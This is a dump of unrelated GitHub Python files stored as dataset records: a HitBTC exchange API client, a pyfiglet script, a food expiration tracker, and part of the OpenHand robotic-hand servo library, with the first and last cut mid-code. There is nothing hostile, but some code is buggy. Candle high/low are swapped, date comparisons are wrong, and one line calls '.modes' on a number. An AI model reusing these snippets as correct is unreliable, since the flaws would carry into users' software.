Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in bid function\")\n\n def ask(self, market, rate, quantity):\n try:\n status, data = self._order_create(market.symbol, side=\"sell\", price=rate, quantity=quantity)\n if status == 200:\n return self._to_order(data)\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in ask function\")\n\n def cancel(self, order_id=None, market=None, all=False):\n try:\n if all:\n status, data = 
self._orders_cancel()\n orders = list(map(self._to_order, data))\n elif market:\n status, data = self._orders_cancel(market.symbol)\n orders = list(map(self._to_order, data))\n elif order_id:\n status, data = self._order_cancel(order_id)\n orders = [self._to_order(data)]\n else:\n raise Exception('Specify order_id, market, or all')\n return orders\n except Exception as e:\n logging.exception(\"Error in cancel function\")\n\n def balance(self):\n try:\n status, data = self._trading_balance()\n if status == 200:\n return {d['currency']: Balance(d['available'], d['reserved']) for d in data if (float(d['available']) + float(d['reserved'])) > 0}\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in balance function\")\n\n def orders(self, market=None):\n try:\n symbol = market.symbol if market else ''\n status, data = self._orders_active(symbol)\n if status == 200:\n orders = list(map(self._to_order, data))\n return orders\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in orders function\")\n\n def order_book(self, market):\n try:\n status, data = self._orderbook(market.symbol)\n if status == 200:\n asks = [Entry(d['price'], d['size']) for d in data['ask'][:10]]\n bids = [Entry(d['price'], d['size']) for d in data['bid'][:10]]\n orderbook = OrderBook(asks, bids)\n return orderbook\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in order_book function\")\n\n def ticker(self, market=None):\n try:\n symbol = market.symbol if market else ''\n status, data = self._tickers(symbol)\n if status == 200:\n if market:\n return self._to_ticker(data, market)\n else:\n tickers = [self._to_ticker(d) for d in data]\n return tickers\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in ticker function\")\n\n def trades(self, market):\n try:\n status, data = self._history_trades(market.symbol)\n if status == 200:\n trades = [self._to_trade(d, market) for d in data]\n return trades\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in trades function\")\n\n def candles(self, market, start=None, limit=100):\n try:\n status, data = self._candles(market.symbol, limit=limit, period='M1')\n if status == 200:\n candles = [self._to_candle(d, market) for d in data]\n # filter out candles from before start param\n candles = [c for c in candles if start is None or c.time.replace(tzinfo=None) > start.replace(tzinfo=None)]\n return candles\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in candles function\")\n\n # Data conversion\n def to_market(self, symbol):\n m = self.markets.get(symbol, None)\n if not m:\n status, data = self._symbols(symbol)\n if status == 200:\n m = Market(counter=data['baseCurrency'], base=data['quoteCurrency'], symbol=symbol, increment=data['quantityIncrement'],\n make_fee=data['provideLiquidityRate'], take_fee=data['takeLiquidityRate'])\n else:\n raise Exception(data['error']['message'])\n return m\n\n def _split_symbol(self, symbol):\n return symbol[:len(symbol)//2], symbol[len(symbol)//2:]\n\n def _to_order(self, data):\n market = self.markets.get(data['symbol'], None)\n if not market:\n market = self.to_market(data['symbol'])\n created = dateutil.parser.parse(data['createdAt'])\n order = Order(order_id=data['clientOrderId'], market=market, side=data['side'],\n 
rate=data['price'], quantity=data['cumQuantity'], time=created)\n return order\n\n def _to_trade(self, data, market=None):\n if not market:\n market = self.to_market(data['symbol'])\n time = dateutil.parser.parse(data['timestamp'])\n order_id = data.get('clientOrderId', None)\n trade = Trade(trade_id=data['id'], order_id=order_id, market=market,\n side=data['side'], rate=data['price'], quantity=data['quantity'], time=time)\n return trade\n\n def _to_ticker(self, data, market=None):\n if not market:\n market = self.to_market(data['symbol'])\n time = data['timestamp']\n ticker = Ticker(market=market, ask=data['ask'], bid=data['bid'], low=data['low'], high=data['high'],\n last=data['last'], base_volume=data['volume'], quote_volume=data['volumeQuote'], time=time)\n return ticker\n\n def _to_candle(self, data, market=None):\n if not market:\n market = self.to_market(data['symbol'])\n time = dateutil.parser.parse(data['timestamp'])\n candle = Candle(market=market, open=data['open'], high=data['min'], low=data['max'],\n close=data['close'], volume=data['volume'], time=time)\n return candle\n\n # API Methods\n # Market\n def _currencies(self, currency=''):\n response = self.session.get(self.base_url + '/public/currency/' + currency)\n return response.status_code, response.json()\n\n def _symbols(self, symbol=''):\n response = self.session.get(self.base_url + '/public/symbol/' + symbol)\n return response.status_code, response.json()\n\n def _tickers(self, symbol=''):\n response = self.session.get(self.base_url + '/public/ticker/' + symbol)\n return response.status_code, response.json()\n\n def _trades(self, symbol, sort=None, by=None, _from=None, till=None, limit=None, offset=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self and v != symbol}\n response = self.session.get(self.base_url + '/public/trades/' + symbol, params=payload)\n return response.status_code, response.json()\n\n def _orderbook(self, symbol):\n response = self.session.get(self.base_url + '/public/orderbook/' + symbol)\n return response.status_code, response.json()\n\n def _candles(self, symbol, limit=None, period=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if period and period not in ['M1', 'M3', 'M5', 'M15', 'M30', 'H1', 'H4', 'D1', 'D7', '1M']:\n raise Exception('Invalid period')\n response = self.session.get(self.base_url + '/public/candles/' + symbol, params=payload)\n return response.status_code, response.json()\n\n # Trading\n def _trading_balance(self):\n response = self.session.get(self.base_url + '/trading/balance')\n return response.status_code, response.json()\n\n def _trading_fee(self, symbol):\n response = self.session.get(self.base_url + '/trading/fee/' + symbol)\n return response.status_code, response.json()\n\n def _orders_active(self, symbol=''):\n payload = {'symbol': symbol}\n response = self.session.get(self.base_url + '/order/', data=payload)\n return response.status_code, response.json()\n\n def _order_active(self, order_id, wait=''):\n if wait:\n payload = {'wait': wait}\n else:\n payload = None\n response = self.session.get(self.base_url + '/order/' + order_id, params=payload)\n return response.status_code, response.json()\n\n def _order_create(self, symbol, side, quantity, price, timeInForce=None,\n type=None, stopPrice=None, expireTime=None, strictValidate=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if side not in [\"buy\", \"sell\"]:\n raise Exception(\"Invalid side\")\n if 
timeInForce and timeInForce not in ['GTC', 'IOC', 'FOK', 'Day', 'GTD']:\n raise Exception(\"Invalid timeInForce\")\n if type and type not in ['limit', 'market', 'stopLimit', 'stopMarket']:\n raise Exception('Invalid type')\n if not stopPrice and payload.get('type', '').startswith('stop'):\n raise Exception(\"Stop price required for stop types\")\n if not expireTime and payload.get('timeInForce', '') == 'GTD':\n raise Exception(\"expireTime required for GTD timeInForce\")\n response = self.session.post(self.base_url + '/order', data=payload)\n\n return response.status_code, response.json()\n\n def _orders_cancel(self, symbol=None):\n if symbol:\n payload = {'symbol': symbol}\n else:\n payload = None\n response = self.session.delete(self.base_url + '/order', data=payload)\n return response.status_code, response.json()\n\n def _order_cancel(self, clientOrderId):\n response = self.session.delete(self.base_url + '/order/' + clientOrderId)\n return response.status_code, response.json()\n\n # History\n def _history_orders(self, symbol=None, clientOrderId=None, _from=None, till=None, limit=None, offset=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if clientOrderId:\n payload = {'clientOrderId': clientOrderId}\n else:\n if _from:\n payload['from'] = payload['_from']\n del payload['_from']\n response = self.session.get(self.base_url + '/history/order', data=payload)\n return response.status_code, response.json()\n\n def _history_trades(self, symbol=None, sort=None, by=None, _from=None, till=None, limit=None, offset=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if _from:\n payload['from'] = payload['_from']\n del payload['_from']\n response = self.session.get(self.base_url + '/history/trades', data=payload)\n return response.status_code, response.json()\n\n def _history_trade(self, orderId):\n response = self.session.get(self.base_url + '/history/order/' + orderId + '/trades')\n return response.status_code, response.json()\n\n\n# if __name__ == \"__main__\":\n# config = configparser.ConfigParser(allow_no_value=True)\n# config.read(\"../config.ini\")\n# b = HitBTCExchange(config[\"hitbtc\"]['BaseUrl'], config['hitbtc']['Key'], config['hitbtc']['Secret'],\n# config['hitbtc']['Symbols'].split(','), False)\n# # r = b._candles('LTCBTC', period='M1')\n# # print_json(r[-1])\n# print(b.markets)","repo_name":"sohailkhanosu/camelopardalis","sub_path":"bot-engines/crypto/hitbtc/hitbtc.py","file_name":"hitbtc.py","file_ext":"py","file_size_in_byte":12927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14662425737","text":"from pyfiglet import Figlet\nfrom sys import exit, argv\nimport random\n\n\nflags = [\"-f\", \"--font\"]\nf = Figlet()\nfonts = f.getFonts()\n\nif len(argv) == 3 and argv[1] in flags and argv[2] in fonts:\n text = input(\"Input: \")\n f.setFont(font=argv[2])\n print(\"Output:\\n\", f.renderText(text))\n\nelif len(argv) == 1:\n text = input(\"Input: \")\n f.setFont(font=random.choice(fonts))\n print(\"Output:\\n\", f.renderText(text))\n\nelse:\n exit(\"Invalid usage\")\n","repo_name":"Maximgitman/cs50_python","sub_path":"week_4_Libraries/figlet/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23146333514","text":"#######################################\n# Contributors (to this file): Nolan Yelverton\n# Date: 
04/01/20\n# Description: Setup for how we're going to store our expiration dates\n#######################################\n\n# Import datetime so we can get the current time.\nfrom datetime import datetime\n\nclass ExperationTracker(object):\n    # Set up a dictionary to store our items' expiration dates\n    experationDict = {}\n\n    # Set up a list to store our items\n    itemList = []\n\n    def __init__(self):\n        pass\n\n    # --Begin Accessors & Mutators--\n    @property\n    def item(self):\n        return self._item\n\n    @item.setter\n    def item(self, item):\n        self._item = item\n\n    @property\n    def date(self):\n        return self._date\n\n    @date.setter\n    def date(self, date):\n        self._date = date\n    # --End Accessors & Mutators--\n\n    # Returns the item that is most about to expire, if it exists\n    def __str__(self):\n        oldestItem = 0\n\n        try:\n            return \"Item: {}\\nExp: {}\".format(self.itemList[oldestItem], self.experationDict[self.itemList[oldestItem]])\n        except IndexError:\n            return \"There are no foods in the list!\"\n\n    # Function that can add items & expiration dates to our dict.\n    # Also stores items into a list of items\n    def itemAdder(self, item, date):\n        self.experationDict[item] = date\n        self.itemList.append(item)\n\n    # Function that will remove items when they are expired.\n    def itemRemover(self):\n        # Get today's date\n        today = datetime.today().strftime('%m/%d/%y')\n\n        # Split the date into Month/Day/Year\n        date = today.split(\"/\")\n\n        # Get the oldest food expiration date, if it exists\n        try:\n            oldestItem = self.itemList[0]\n        except IndexError:\n            print(\"There aren't any foods in the list!\")\n            return\n\n        # Get the date of the oldest item\n        experation = self.experationDict[oldestItem]\n\n        expDate = experation.split(\"/\")\n\n        # If the year of the food's expiration date is older than the current date, remove it\n        if (expDate[2] < date[2]):\n            self.itemList.remove(oldestItem)\n\n        # If the month of the food's expiration date is older than the current date, remove it\n        elif (expDate[0] < date[0]):\n            self.itemList.remove(oldestItem)\n\n        # If the day of the food's expiration date is older than the current date, remove it\n        elif (expDate[1] < date[1]):\n            self.itemList.remove(oldestItem)\n\n        # If the food's expiration date is today's date, say that the food expires today\n        elif (expDate[0] == date[0] and expDate[1] == date[1]):\n            print(\"Your {} expires today!\".format(oldestItem))\n\n        # Otherwise, just say nothing has expired\n        else:\n            print(\"Nothing has expired!\")\n\n#######################################\n\n# Sample of taking an input and handling expiration dates\net = ExperationTracker()\n\nfood = raw_input(\"Please enter the food's name: \")\n\ndate = raw_input(\"Please enter the food's expiration date (MM/DD/YY): \")\n\net.itemAdder(food, date)\nprint(et)\nprint\net.itemRemover()\nprint\nprint(et)\n","repo_name":"Ndymario/132-Project","sub_path":"code/Experation_Tracker/experation_date_tracker.py","file_name":"experation_date_tracker.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
{"seq_id":"10642879958","text":"#!/usr/bin/python -i\n\n#Created by multiple users\n#Yale Grablab\n#Updated 09/2019\n\nfrom __future__ import print_function\nfrom lib_robotis_mod import *\nimport time\nimport numpy as np\t#for array handling\nimport scipy.io\nimport math\nfrom decimal import Decimal\n\n#Assumptions:\n\t#only dynamixel servos being used\n\t#either all RX or MX servos being used (no mixing)\n\t#different encoder limits for each 
type\n\t\t#motor limits and mov't designated in terms of proportion, not encoder value\n\n\nclass OpenHand():\n\tdyn = None\t\t#USB2Dynamixel device\n\tport = None\t\t#mounted port, /devttyUSB# in Linux, COM# in Windows\n\tservo_ids = []\n\tservos = []\n\n\tservo_speed = 1.0\n\tmax_torque = 0.4\t#Dynamixel suggests capping max torque at 0.4 of stall torque\n\n\tmotorDir = []\n\tmotorMin = []\n\tmotorMax = []\n\tmodes = []\t\t#position control (True) or torque/pseudo-torque control (False)\n\n\tamnt_release = 0.0\t#values [0,1.0] for degree of closing and opening\n\tamnt_close = 0.5\n\n\tpause = 0.3\t\t#amount of time to wait for move commands and eeprom updates\n\n\tHAND_HEIGHT = 0.14\t#hand height from base to palm (m) used for arm IK and approach vectors\n\tWRIST_OFFSET = -np.pi/3\t#J5 offset (rad) to accommodate final orientation\n\n\tdef __init__(self,port,servo_ids,series=\"RX\"):\n\t\tself.port = port\n\t\tself.dyn = USB2Dynamixel_Device(port)\t#always only one\n\t\tself.servo_ids = servo_ids\n\t\tnum_servos = len(servo_ids)\n\n\t\tprint( \"Initializing...\")\n\t\tself.servos = []\n\t\tfor servo_id in self.servo_ids:\n\t\t\tif series == \"RX\" or series ==\"MX\":\n\t\t\t\tself.servos.append(Robotis_Servo(self.dyn,servo_id,series))\n\t\t\telse: #We will be using protocol 2 instead\n\t\t\t\tself.servos.append(Robotis_Servo_X(self.dyn,servo_id,series))\n\n\t\t\tprint( \"Adding servo id \"+repr(servo_id))\n\t\t\ttime.sleep(self.pause)\n\t\tfor servo in self.servos:\n\t\t\tservo.kill_cont_turn()\t\t#make sure position mode limits are enabled\n\n\t\t\ttime.sleep(self.pause)\t\t#in case eeprom delay is what is causing the issues\n\t\t\tif series == \"RX\":\n\t\t\t\tservo.apply_speed(1)\n\t\t\ttime.sleep(self.pause)\n\t\t\tservo.apply_max_torque(self.max_torque)\n\t\tself.modes = [True]*num_servos\t\t#default assignment (shouldn't have servos in torque mode during normal operation)\n\n\t\tif len(self.motorDir)!=num_servos or len(self.motorMin)!=num_servos or len(self.motorMax)!=num_servos:\n\t\t\tprint( \"[ERR] Servo number mismatch, resetting motor limits\")\n\t\t\tself.motorDir = [1]*num_servos\n\t\t\tself.motorMin = [self.amnt_release]*num_servos\n\t\t\tself.motorMax = [self.amnt_close]*num_servos\n\n\t\tif num_servos == 4: #This is the model_O and we want to prevent gear shear\n\t\t\tfor i in range(num_servos):\n\t\t\t\tenc = self.servos[i].read_encoder()\n\t\t\t\tif series == \"RX\":\n\t\t\t\t\tif (self.motorDir[i] ==1 and enc > 512) or (self.motorDir[i] == -1 and enc < 512):\n\t\t\t\t\t\tprint( \"------------FAILSAFE-------------\")\n\t\t\t\t\t\tprint( \"Failsafe is incorporated to prevent gear shear in Model O\")\n\t\t\t\t\t\tprint( \"Motor encoder postion: \", enc)\n\t\t\t\t\t\tinput = raw_input(\"Your encoder position for motor index \" + str(i) + \" may cause the motor to move backwards and break gears. We recommend you resetting the fingers to prevent gear shear, proceed? [ENTER]\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint( \"Motor directions not set...\")\n\t\t\t\t#These would then be the MX and XM motors\n\t\t\t\telif (self.motorDir[i] ==1 and enc > 2048) or (self.motorDir[i] == -1 and enc < 2048):\n\t\t\t\t\tprint( \"------------FAILSAFE-------------\")\n\t\t\t\t\tprint( \"Failsafe is incorporated to prevent gear shear in Model O\")\n\t\t\t\t\tprint( \"Motor encoder postion: \", enc)\n\t\t\t\t\tinput = raw_input(\"As an XM Motor, we can automatically fix this issue for motor \" + str(i) + \", proceed? 
[ENTER]\")\n\t\t\t\t\tself.servos[i].enable_extended_position_control_mode()\n\t\t\t\t\tself.servos[i].move_to_encoder(self.servos[i].settings['max_encoder']+100)\n\t\t\t\t\ttime.sleep(self.pause)\n\t\t\t\t\tself.servos[i].disable_extended_position_control_mode()\n\t\t\t\t\ttime.sleep(self.pause)\n\t\t\t\t\tprint( \"Fixed servo from ID: \"+repr(servo_ids[i]))\n\t\t\t#Finally, limit the abduction_torque if desired\n\t\t\tif self.abduction_limit !=1:\n\t\t\t\tself.servos[0].enable_current_position_control_mode(self.abduction_limit)\n\n\t\ttime.sleep(self.pause)\n\t\tself.reset()\n\t\tprint( \"Initialization Complete.\")\n\n\tdef reset(self):\t#returns everything to zeroed positions, different from release\n\t\tprint( \"[ERR] reset() not implemented\")\n\t\treturn False\n\n\tdef release(self):\t#opens the finger components, doesn't necessarily move non-finger servos\n\t\tprint( \"[ERR] release() not implemented\\n\")\n\t\treturn False\n\t#close functions are normalized regardless of mode such that the operating range [0,1.0] makes sense\n\tdef close(self,amnt=0.5):\n\t\tprint( \"[ERR] close() not implemented\\n\")\n\t\treturn False\n\t#tval: torque applied to servos, dpos: delta position overshoot beyond current\n\tdef close_torque(self,tval=0.2,dpos=1.0):\n\t\tprint( \"[ERR] close_torque() not implemented\\n\")\n\t\treturn False\n\t#difference between close_torque should just be the particular servos that are actuated\n\tdef _close_torques(self,tval=0.2,dpos=1.0,idxs=None):\n\t\tif idxs is None:\t#effect on all servos if id's not specified\n\t\t\tidxs = range(len(self.servos))\n\t\thp,he = self.readHand()\n\t\tfor idx in idxs:\n\t\t\tself.torqueMotor(idx,tval,hp[idx]+dpos)\n\t\ti=0\n\t\twhile i<15:\t\t#some arbitrary limit on torque closing\n\t\t\tfor idx in idxs:\n\t\t\t\tif not self.servos[idx].is_moving():\n\t\t\t\t\tamnt,enc = self.readMotor(idx)\n\t\t\t\t\tself.moveMotor(idx,amnt)\t#exit out of torque mode\n\t\t\ttime.sleep(self.pause)\n\t\t\ti+=1\n\t\tself.hold()\n\n\n\t#move servo according to amnt, not encoder value, scaled between designated min/max values\n\tdef moveMotor(self,index,amnt):\n\t\tif amnt < 0. or amnt > 1.0:\n\t\t\tprint( \"[WARNING] motion out of bounds, capping to [0,1]. 
Index: \"+repr(index)+\", Cmd:\"+repr(amnt))\n\t\tamnt = min(max(amnt,0.),1.0)\n\t\tif (index < 0 or index >= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tservo = self.servos[index]\n\n\t\t\tif self.motorDir[index]>0:\t#normal case\n\t\t\t\tservo.move_to_encoder(int(servo.settings[\"max_encoder\"]*(self.motorMin[index] + amnt*(self.motorMax[index]-self.motorMin[index]))))\n\t\t\telse:\t\t\t\t#reverse\n\t\t\t\tservo.move_to_encoder(int(servo.settings[\"max_encoder\"]*(self.motorMax[index] - amnt*(self.motorMax[index]-self.motorMin[index]))))\n\n\t\t\tif not self.modes[index]:\t#restore position-control mode if necessary - want to register new encoder target first before re-applying system torque\n\t\t\t\tself.modes[index] = True\n\t\t\t\tservo.apply_max_torque(self.max_torque)\n\n\tdef getCurrDir(self):\n\t\tglobal currdir, take_no\n\t\tprint( 'Current directory: ')\n\t\tcurrdir = raw_input()\n\t\tprint( 'Take number: ')\n\t\ttake_no = raw_input()\n\n\n\tdef torqueMotor(self,index,val,pos_val=None):\n\t\tval = min(1.0,max(val,0))\t#by design, can exceed default max torque value\n\t\tself.modes[index] = False\t#swap to torque mode in record keeping\n\t\ts = self.servos[index]\n\t\tif pos_val is None:\n\t\t\tenc = s.settings['max_encoder']\n\t\telse:\n\t\t\tpos_val = min(max(0,pos_val),1.0) #new target position is always max to force saturation of servo torque\n\t\t\tenc = int((pos_val * (self.motorMax[index]-self.motorMin[index])+self.motorMin[index]) * s.settings['max_encoder'])\n\n\t\ts.apply_max_torque(val)\n\t\ts.move_to_encoder(enc)\n\n\tdef moveHand(self,vals):\n\t\tif len(vals)!=len(self.servos):\n\t\t\tprint( \"[ERR] Motor number mismatch\")\n\t\telse:\n\t\t\tfor i in range(len(vals)):\n\t\t\t\tself.moveMotor(i,vals[i])\n\n\t#returns motor position amnt, between designated min and max values\n\tdef readMotor(self,index):\n\t\tservo = self.servos[index]\n\t\tenc = servo.read_encoder()\n\t\tif self.motorDir[index]>0:\n\t\t\tval = (enc/float(servo.settings[\"max_encoder\"])-self.motorMin[index]) / (self.motorMax[index]-self.motorMin[index])\n\t\telse:\n\t\t\tval = (self.motorMax[index]-enc/float(servo.settings[\"max_encoder\"])) / (self.motorMax[index]-self.motorMin[index])\n\t\treturn val,enc\n\n\n\tdef readLoads(self):\n\t\tfor servo in self.servos:\n\t\t\tprint( \"---\")\n\t\t\tprint( \"Servo ID: \"+repr(servo.servo_id))\n\t\t\tprint( \"Load: \"+repr(servo.read_load()))\n\n\tdef readMotorMins(self):\n\t\tindex=0\n\t\tfor servo in self.servos:\n\t\t\tprint( \"---\")\n\t\t\tprint( \"Servo ID: \"+repr(servo.servo_id))\n\t\t\tprint( \"Motor Mins: \"+ repr(self.motorMin[index]))\n\t\t\tindex=index+1\n\n\tdef readHand(self):\n\t\tamnts = np.array([0.]*len(self.servos))\n\t\tencs = np.array([0]*len(self.servos))\n\n\t\tfor i in range(len(self.servos)):\n\t\t\tamnt,enc = self.readMotor(i)\n\t\t\tamnts[i] = amnt\n\t\t\tencs[i] = enc\n\n\t\treturn amnts, encs\n\n\t#takes the current location and sets either the min or max\n\tdef setMotorMin(self):\n\t\tamnts,encs = self.readHand()\n\t\tself.motorMin = (encs/float(self.servos[0].settings['max_encoder'])).tolist()\n\tdef setMotorMax(self):\n\t\tamnts,encs = self.readHand()\n\t\tself.motorMax = (encs/float(self.servos[0].settings['max_encoder'])).tolist()\n\n\t#setting the max torque (shortcut for torque-based closing motions)\n\tdef setMaxTorque(self,val=0.4):\n\t\tval = max(min(1.0,val),0.1)\n\t\tfor servo in self.servos:\n\t\t\tservo.apply_max_torque(val)\n\t\t\ttime.sleep(self.pause)\t#helps 
mitigate eeprom delay issues?\n\t\tself.max_torque = val\n\n\tdef setServoSpeed(self,val=1.0):\n\t\tval = max(min(1.0,val),0.1)\n\t\tfor servo in self.servos:\n\t\t\tservo.apply_speed(val)\n\t\t\ttime.sleep(self.pause)\n\t\tself.servo_speed = val\n\n\t#moves to the current encoder value and locks servos in place to minimize current draw\n\tdef preventAllLoadErrors(self,offset_scale = 0):\n\t\tfor i in range(len(self.servos)):\n\t\t\tself.preventLoadError(i,offset_scale)\n\tdef preventLoadError(self,i,offset_scale = 0):\n\t\tif abs(self.servos[i].read_load()) > 80:\t#arbitrary load threshold\n\t\t\tvalue = offset_scale*10 + self.servos[i].read_encoder()\t#should never be negative\n\t\t\tif value < self.servos[i].settings['max_encoder']:\n\t\t\t\tself.servos[i].move_to_encoder(value)\n\t\t\telse:\n\t\t\t\tif value < 0:\n\t\t\t\t\tself.servos[i].move_to_encoder(0)\n\t\t\t\telse:\n\t\t\t\t\tself.servos[i].move_to_encoder(self.servos[i].settings['max_encoder'])\n\t#move to the current position for each motor - fast switch from torque mode and alternative to preventAllLoadErrors\n\tdef hold(self):\n\t\tfor i in range(len(self.servos)):\n\t\t\tamnt, enc = self.readMotor(i)\n\t\t\tself.moveMotor(i,amnt)\n\n\tdef diagnostics(self):\n\t\tfor servo in self.servos:\n\t\t\tprint( \"---\")\n\t\t\tprint( \"Servo ID: \"+repr(servo.servo_id))\n\t\t\tprint( \"Load: \"+repr(servo.read_load()))\n\t\t\tprint( \"Temperature: \"+repr(servo.read_temperature()))\n\t\t\tprint( \"Target Encoder: \"+repr(servo.read_target_encoder()))\n\t\t\tprint( \"Current Encoder: \"+repr(servo.read_encoder()))\n\n\n#------------------------------------------------------#\n\n#Different hand types\n\n#------------------------------------------------------#\n\nclass GR2(OpenHand):\n\tmotorDir = [1,1]\n\tmotorMin = [0.05,0.05]\t#should always be symmetric here?\n\tmotorMax = [0.7,0.7]\n\n\tHOLD_TORQUE = 0.2\n\tOVERSHOOT = 0.15\n\n\tpause = 0.2\n\n\tdef __init__(self,port=\"/dev/ttyUSB0\",s1=1,s2=2,dyn_model=\"MX\"):\n\t\tOpenHand.__init__(self,port,[s1,s2],dyn_model)\n\n\tdef reset(self):\n\t\tself.release()\n\tdef release(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\t\tself.moveMotor(1,self.amnt_release)\n\tdef close(self,amnt=0.3):\n\t\tself.moveMotor(0,amnt)\n\t\tself.moveMotor(1,amnt)\n\t#replacement for preventAllLoadErrors() due to servo state constraints\n\tdef hold(self):\n\t\tfor i in range(2):\n\t\t\tamnt,enc = self.readMotor(i)\n\t\t\tself.moveMotor(i,amnt)\t#accounts for possible transition from torque mode\n\t#tval: torque value\n\t#dpos: delta in position from current (may force operation into compliance region)\n\tdef close_torque(self,tval=None,dpos=1.0):\n\t\tif tval is None:\n\t\t\ttval = self.HOLD_TORQUE\n\t\tself._close_torques(tval,dpos)\n\n\t#demo motion that moves object back and forth with shift (assumes symmetry in operation)\n\tdef sweep(self,val):\n\t\tamnts,encs = self.readHand()\t#record starting pose to return to\n\t\tself.shift(0,val)\n\t\ttime.sleep(self.pause)\n\t\tself.shift(1,val)\n\t\ttime.sleep(self.pause*3)\n\t\tself.shift(0,amnts[0])\n\t\ttime.sleep(self.pause)\n\t\tself.shift(0,amnts[1])\n\t\ttime.sleep(self.pause)\n\t\tself.moveHand(amnts)\n\n\t#assumes operation starts with grasp w/ full contact\n\t\t#either pushing or relaxing a finger towards a desired position\n\tdef shift(self,index,val):\n\t\tother_index = (index+1)%2\n\t\tvals,encs = self.readHand()\n\n\t\tif val= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tif (index 
>0):\n\t\t\t\tself.motorMin[index]=val\n\t\t\t\tself.motorMax[index]=val+self.max_close\n\t\t\telse:\t#case of the adduction motor\n\t\t\t\tself.motorMin[index]=val\n\t\t\t\tself.motorMax[index]=val+0.5\n\t\t\tself.reset()\n\t\t\tprint( 'Index changed successfully...')\n\n\t#abduct/adduct fingers - if no param given, move to power grasp\n\tdef adduct(self,amnt=1):\n\t\tself.moveMotor(0,amnt)\n\n \t#abduct fingers - then pinch close\n\tdef pinch_close(self,amnt=0.4):\n\t\tadduct_loc, enc = self.readHand()\n\t\tif(adduct_loc[0] > 0.05):\n\t\t\tself.reset()\n\t\t\ttime.sleep(1.5) #pause for 1.5 seconds to allow reset\n\t\tself.moveMotor(1,amnt)\n\t\tself.moveMotor(2,amnt)\n\n\t#adduct fingers - then power close\n\tdef power_close(self,amnt=0.6):\n\t\tadduct_loc, enc = self.readHand()\n\t\tif(adduct_loc[0] < 0.95):\n\t\t\tself.release()\n\t\t\ttime.sleep(1) #pause for 1 second to allow release\n\t\t\tself.adduct(1) #move fingers facing thumb\n\t\t\ttime.sleep(1)\n\t\tself.close(amnt)\n\n \t#Example why torque control is required for fingertip manipulation\n\tdef pinch_object_move(self,delta_amnt=0.03, left=True, down = False): #These cannot be the same or else we will move diagonal\n\t\tadduct_loc, enc = self.readHand()\n\t\tif(adduct_loc[0] > 0.05):\n\t\t\tprint( '[ERR] Hand is not in a pinch grasp')\n\t\t\treturn\n\t\telse:\n\t\t\tlocs, enc = self.readHand()\n\t\t\tif left==True and down == False:\t\t#move left\n\t\t\t\tself.moveMotor(1,locs[1]+delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]-delta_amnt)\n\t\t\telif left==False and down == False: \t\t#move right\n\t\t\t\tself.moveMotor(1,locs[1]-delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]+delta_amnt)\n\t\t\telif left==False and down == True: \t\t#move down\n\t\t\t\tself.moveMotor(1,locs[1]+delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]+delta_amnt)\n\t\t\telse: \t\t\t\t\t\t#move up\n\t\t\t\tself.moveMotor(1,locs[1]-delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]-delta_amnt)\n\n\t#replacement for preventAllLoadErrors() due to servo state constraints\n\tdef hold(self):\n\t\tfor i in [1,2]:\n\t\t\tamnt,enc = self.readMotor(i)\n\t\t\tself.modes[i] = True\n\t\t\tself.servos[i].apply_max_torque(self.max_torque)\n\t\t\tself.moveMotor(i,amnt+0.025)\t#accounts for possible transition from torque mode\n\n\t#tval: torque value\n\t#dpos: delta in position from current (may force operation into compliance region)\n\tdef close_torque(self,tval=None,dpos=1.0):\n\t\tif tval is None:\n\t\t\ttval = self.HOLD_TORQUE\n\t\tself._close_torques(tval,dpos)\n\n\t#Sets the motor into a torque mode so that fingertip manipulation is possible\n\tdef torqueMotor(self,index,val,pos_val=None):\n\t\tval = min(1.0,max(val,0))\t#by design, can exceed default max torque value\n\t\tself.modes[index] = False #turn into torque mode\n\t\ts = self.servos[index]\n\t\tif pos_val is None:\n\t\t\tenc = int(s.read_encoder()+self.OVERSHOOT * s.settings['max_encoder'])\n\t\telse:\n\t\t\tpos_val = min(max(0,pos_val),1.0)\n\t\t\tenc = int((pos_val * (self.motorMax[index].modes-self.motorMin[index])+self.motorMin[index]) * s.settings['max_encoder'])\n\n\t\ts.apply_max_torque(val)\n\n \t#assumes operation starts with grasp w/ full contact\n\t#either pushing or relaxing a finger\n\t#shifts object to the edge of the workspace\n\tdef shift(self,index,val, wait_range=None):\n\t\tif index != 1 and index !=2:\n\t\t\tprint( \"[ERR] Can only shift using power grasp with opposing fingers 1 and 2\")\n\t\t\treturn\n\n\t\tother_index=1\n\t\tif (index == 1):\n\t\t\tother_index=2\n\t\tvals,encs = 
